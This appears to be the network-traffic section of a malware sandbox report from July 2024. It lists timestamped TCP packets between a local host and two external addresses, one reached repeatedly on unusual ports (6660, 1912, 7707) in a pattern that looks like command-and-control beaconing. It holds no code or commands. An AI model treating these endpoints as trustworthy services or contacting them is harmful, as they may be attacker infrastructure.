Jul 6, 2024 13:27:37.862586021 CEST	6660	49777	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.863205910 CEST	6660	49787	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.863270998 CEST	49787	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.863596916 CEST	49787	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.868491888 CEST	6660	49787	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:38.399193048 CEST	80	49786	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:38.399410009 CEST	80	49786	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:38.399455070 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.402436972 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.518712044 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.523670912 CEST	80	49788	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:38.523736000 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.523776054 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.528939009 CEST	80	49788	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:38.528986931 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:38.534033060 CEST	80	49788	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.268532991 CEST	80	49788	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.269732952 CEST	80	49788	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.269893885 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.274736881 CEST	49788	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.414437056 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.422465086 CEST	80	49789	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.422550917 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.422769070 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.428870916 CEST	80	49789	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.429249048 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:39.434187889 CEST	80	49789	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:39.503149033 CEST	6660	49787	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:39.511687040 CEST	49787	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:40.121005058 CEST	80	49789	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:40.122152090 CEST	80	49789	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:40.122212887 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.124644041 CEST	49789	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.237457991 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.242281914 CEST	80	49790	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:40.242340088 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.242398024 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.247210979 CEST	80	49790	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:40.247250080 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:40.251979113 CEST	80	49790	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:41.062048912 CEST	80	49790	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:41.062827110 CEST	80	49790	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:41.063114882 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.066793919 CEST	49790	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.175124884 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.183514118 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:41.186031103 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.186031103 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.194293022 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:41.194437027 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:41.202332973 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:42.261625051 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:42.266745090 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:42.444463015 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:42.514947891 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.073749065 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.073771954 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.073781013 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.075695038 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.095695019 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.225131035 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.295994997 CEST	80	49791	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.296190023 CEST	49791	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.296365976 CEST	80	49792	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.297419071 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.297660112 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.316066027 CEST	80	49792	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.317035913 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:43.322479010 CEST	80	49792	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:43.516910076 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.522241116 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704818010 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704840899 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704870939 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704909086 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.704916000 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704930067 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.704960108 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.705728054 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.705790997 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.756870985 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.761672020 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.939949036 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:43.947406054 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:43.952332020 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:44.078346014 CEST	80	49792	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:44.079200029 CEST	80	49792	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:44.079255104 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.082102060 CEST	49792	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.131620884 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:44.191195011 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.196151972 CEST	80	49793	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:44.196208000 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.196265936 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.201050043 CEST	80	49793	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:44.201091051 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:44.205940962 CEST	80	49793	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:44.322031021 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:44.601025105 CEST	49787	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:44.601341009 CEST	49794	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:44.606013060 CEST	6660	49787	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:44.606281996 CEST	6660	49794	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:44.606565952 CEST	49794	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:44.606864929 CEST	49794	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:44.611752987 CEST	6660	49794	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:45.047868967 CEST	80	49793	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.048270941 CEST	80	49793	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.048453093 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.052416086 CEST	49793	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.159343004 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.171428919 CEST	80	49795	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.171737909 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.171914101 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.176714897 CEST	80	49795	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.176906109 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.181667089 CEST	80	49795	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.972578049 CEST	80	49795	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.973184109 CEST	80	49795	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:45.973236084 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:45.976244926 CEST	49795	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:46.081348896 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:46.086173058 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:46.086237907 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:46.086304903 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:46.091114044 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:46.091159105 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:46.097910881 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:46.267296076 CEST	6660	49794	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:46.267353058 CEST	49794	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:47.019702911 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:47.024624109 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:47.206533909 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:47.211700916 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:47.216511965 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:47.394468069 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:47.442182064 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:48.036571980 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:48.775700092 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:48.778719902 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.778737068 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.778744936 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.778888941 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.779829025 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.779970884 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.780510902 CEST	80	49796	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.780920982 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.782080889 CEST	49796	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.782438993 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:48.782459021 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:48.782558918 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:48.789340019 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:48.794416904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:48.894068956 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.898900032 CEST	80	49798	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.898979902 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.899039984 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.903789043 CEST	80	49798	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.903901100 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:48.908714056 CEST	80	49798	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:48.969544888 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:49.050618887 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:49.444586992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:49.444840908 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:49.447741032 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:49.450423002 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:49.455276966 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:49.635654926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:49.729351997 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:49.763068914 CEST	80	49798	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:49.763170958 CEST	80	49798	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:49.763226032 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.766524076 CEST	49798	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.878216982 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.884079933 CEST	80	49799	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:49.884143114 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.884185076 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.890782118 CEST	80	49799	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:49.890827894 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:49.895632982 CEST	80	49799	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.251004934 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:50.255959988 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:50.256015062 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:50.261084080 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:50.598746061 CEST	80	49799	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.598977089 CEST	80	49799	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.599375010 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.602313995 CEST	49799	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.706248999 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.711143017 CEST	80	49800	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.711307049 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.711307049 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.717434883 CEST	80	49800	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.717628956 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:50.723659039 CEST	80	49800	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:50.911712885 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:50.916646004 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:50.916660070 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:50.916668892 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.182461023 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.187725067 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.193064928 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.193074942 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.193090916 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.193099976 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.193208933 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.193217993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.268294096 CEST	49794	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.268651962 CEST	49801	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.273243904 CEST	6660	49794	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.273441076 CEST	6660	49801	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.273539066 CEST	49801	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.273883104 CEST	49801	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.278660059 CEST	6660	49801	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.379240036 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:51.440025091 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:51.441332102 CEST	80	49800	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:51.441344976 CEST	80	49800	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:51.441474915 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.447700977 CEST	49800	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.551712990 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.556612015 CEST	80	49802	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:51.556746960 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.556829929 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.561647892 CEST	80	49802	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:51.561723948 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:51.566498041 CEST	80	49802	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.260349989 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.313571930 CEST	80	49802	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.315718889 CEST	80	49802	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.315764904 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.318010092 CEST	49802	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.393193007 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.393240929 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.425030947 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.431430101 CEST	80	49803	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.431494951 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.431545019 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.437025070 CEST	80	49803	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.437067986 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:52.442364931 CEST	80	49803	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:52.453406096 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.458256006 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.458302021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.463112116 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.656900883 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.661875963 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.661887884 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.661897898 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.661906958 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.661915064 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.661998987 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.662062883 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.662071943 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.662075996 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.662132978 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.666686058 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.666693926 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.666707039 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.666714907 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909441948 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909460068 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909477949 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909490108 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909498930 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909512043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909523964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909533978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909544945 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909559965 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.909563065 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.909599066 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.909657955 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.910712004 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.910722971 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.910733938 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.910743952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.910756111 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.910773993 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.910828114 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.916595936 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.916608095 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.916824102 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.929696083 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.943059921 CEST	6660	49801	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.943221092 CEST	49801	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:52.999910116 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.999932051 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.999949932 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:52.999972105 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.000031948 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000044107 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000050068 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.000226021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.000287056 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000374079 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000397921 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000416040 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000427961 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.000437021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.000451088 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.001178980 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.001205921 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.001218081 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.001275063 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.001338959 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.001355886 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002098083 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002152920 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002170086 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002182007 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.002254963 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002265930 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.002280951 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.002552986 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.003103018 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.003187895 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.003200054 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.003218889 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.003271103 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.003298044 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.033499956 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.038487911 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.049379110 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.083895922 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.084135056 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.084146023 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.084222078 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.091331959 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091373920 CEST	7707	49797	94.232.249.204	192.168.2.4
